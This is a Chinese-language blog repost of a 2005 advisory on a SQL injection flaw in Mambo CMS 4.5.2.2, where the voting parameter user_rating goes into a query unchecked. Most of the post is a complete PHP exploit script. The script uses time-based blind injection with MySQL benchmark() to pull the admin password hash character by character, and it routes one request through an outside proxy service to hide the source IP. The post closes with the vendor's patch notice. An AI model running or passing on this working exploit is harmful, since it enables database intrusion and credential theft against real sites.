mambo 服务商规定的mysql密码,Mambo com_content远程SQL注入漏洞

毁男孩的小图纸

于 2021-03-16 23:18:25 发布

阅读量209

点赞数

文章标签： mambo 服务商规定的mysql密码

发布日期：2005-06-16更新日期：2005-06-16受影响系统：

Mambo Mambo Open Source <= 4.5.2.2不受影响系统：

Mambo Mambo Open Source 4.5.2.3描述：

BUGTRAQ ID: 13966Mambo是一款开放源代码的WEB内容管理系统。Mambo的com_contents中存在严重的SQL注入漏洞，远程攻击者可能利用此漏洞非法操作数据库。 -- content.php -- 100 case 'vote': 101 recordVote ( $url , $user_rating , $cid , $database); 102 break; ... 1478 $query = "UPDATE #__content_rating" 1479 . "\n SET rating_count = rating_count + 1," 1450 . "\n rating_sum = rating_sum + $user_rating," 1451 . "\n lastip = '$currip'" 1452 . "\n WHERE content_id = ". $cid 1453 ; ----------------在1450行$user_rating未经任何验证便使用用户提供的数据，导致用户可以获得敏感信息。测试方法：

警告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！*/if (!(function_exists('curl_init'))) { echo "cURL extension required\n"; exit;}ini_set("max_execution_time","999999");$benchcount = 150000;$aid= 62;$cid = 2;$charmap = array (48,49,50,51,52,53,54,55,56,57, 97,98,99,100,101,102, 103,104,105, 106,107,108,109,110,111,112,113, 114,115,116,117,118,119,120,121,122 ); if($argv[1]){ $url = $argv[1]; if ($argv[2]) $aid = $argv[2]; if ($argv[3]) $benchcount = $argv[3]; if ($argv[4]) $proxy = $argv[4]; }else { echo "Usage: ".$argv[0]." [userid] [benchmarkcount] [proxy]\n\n"; echo "\tURL\t URL to mambo site (ex: http://127.0.0.1)\n"; echo "\taid\t userid to get (default: 62 (admin))\n"; echo "\tbenchmarkcount\t benchmark count (default: 150000)\n"; echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n"; exit;}// rate from different ip (using http://projectbypass.com)$projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/";$ch = curl_init();curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?op \tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);// standard page loading time$start = time();$ch = curl_init();if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);$res = curl_exec($ch);curl_close ($ch);$stop = time();$sloadtime = floatval($stop - $start);echo "standard page loading =".$sloadtime."\n"; // benchmark page loading time$start = time();$ch = curl_init();if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); }curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid \=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ \benchcount,md5(1)),1))+where+content_id=$cid/*"); curl_setopt($ch, \CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch);curl_close ($ch);$stop = time();$bloadtime = floatval($stop - $start);echo "bencmark page loading =".$bloadtime."\n"; // check if SQL query failedif (ereg("DB function failed",$res)){ echo "[x] mysql < 4.1 detected - not exploitable\n"; exit();}if ($bloadtime <= $sloadtime + 2){ echo "[x] increase your benchmark count\n"; exit();}echo "Take your time for Teh Tarik... please wait ...\n\n";echo "Result:\n";echo "\tUserid = $aid\n";echo "\tPassword Hash = ";// starting fetch password$benchcount = $benchcount*2; for($i= 1;$i< 33;$i++){ foreach ($charmap as $char){ $start = time(); echo chr($char); $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Item \id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a \nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co \ntent_id=$cid/*"); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); $stop = time(); $xloadtime = floatval($stop - $start); if (floatval($xloadtime) > $bloadtime){ $hash .= chr($char); break 1; } else { echo chr(8); } if ($char == 103){ echo "\n\n\tNot Vulnerable or Something wrong occur ...\n"; exit; } }}echo "\n";?>建议：

厂商补丁：Mambo-----目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载4.5.2.3版本：http://mamboforge.net/frs/download.php/6151/MamboV4.5.2.3-stable.tar.g z

小编推荐：欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术，请点击这里注册账号，公开课频道价值万元IT培训教程免费学，让您少走弯路、事半功倍，好工作升职加薪！

免责声明：本站系公益性非盈利IT技术普及网，本文由投稿者转载自互联网的公开文章，文末均已注明出处，其内容和图片版权归原网站或作者所有，文中所述不代表本站观点，若有无意侵权或转载不当之处请从网站右下角联系我们处理，谢谢合作！